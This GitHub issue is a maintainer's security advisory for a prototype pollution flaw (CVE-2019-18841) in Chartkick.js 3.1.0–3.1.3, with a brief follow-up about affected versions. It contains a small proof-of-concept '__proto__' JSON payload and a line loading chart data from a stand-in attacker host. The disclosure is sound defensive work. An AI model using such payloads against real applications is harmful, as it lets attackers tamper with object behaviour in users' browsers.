Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Prototype Pollution in Chartkick.js 3.1.x #117

Closed
ankane opened this issue Nov 10, 2019 · 2 comments
Closed

Prototype Pollution in Chartkick.js 3.1.x #117

ankane opened this issue Nov 10, 2019 · 2 comments

Comments

@ankane
Copy link
Owner

ankane commented Nov 10, 2019

Under certain conditions, the 3.1.x series of Chartkick.js is vulnerable to prototype pollution. This is same type of issue that was announced for jQuery and other popular libraries earlier this year. jQuery rated this a "minor vulnerability". It's certainly unintended behavior, but since Chartkick.js is a client-side only library, its impact is likely limited. This vulnerability has been assigned the CVE identifier CVE-2019-18841.

Versions Affected: 3.1.0 to 3.1.3
Fixed Versions: 3.2.0
Versions Unaffected: < 3.1.0

Impact

Passing untrusted input to JSON.parse and the result to Chartkick.js can pollute Object.prototype.

var badOptions = JSON.parse('{"__proto__": {"test": true}}')
new Chartkick.LineChart("chart", data, badOptions)
console.log("test" in {})

A specially crafted response in data loaded via URL can cause pollution well.

new Chartkick.LineChart("chart", "https://evil.com/data")

All users running an affected release should upgrade immediately.

@guimard
Copy link

guimard commented Nov 16, 2019

Hi, are you sure this vulnerability does not exists before ? In 2.1.0, I saw some lines that looks like those fixed.

Cheers,

@ankane
Copy link
Owner Author

ankane commented Nov 16, 2019

Hey @guimard, I didn't find any other affected versions in my testing, but please follow up with the email address in my profile if you can demonstrate the issue in other versions, and I'll update the CVE accordingly.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants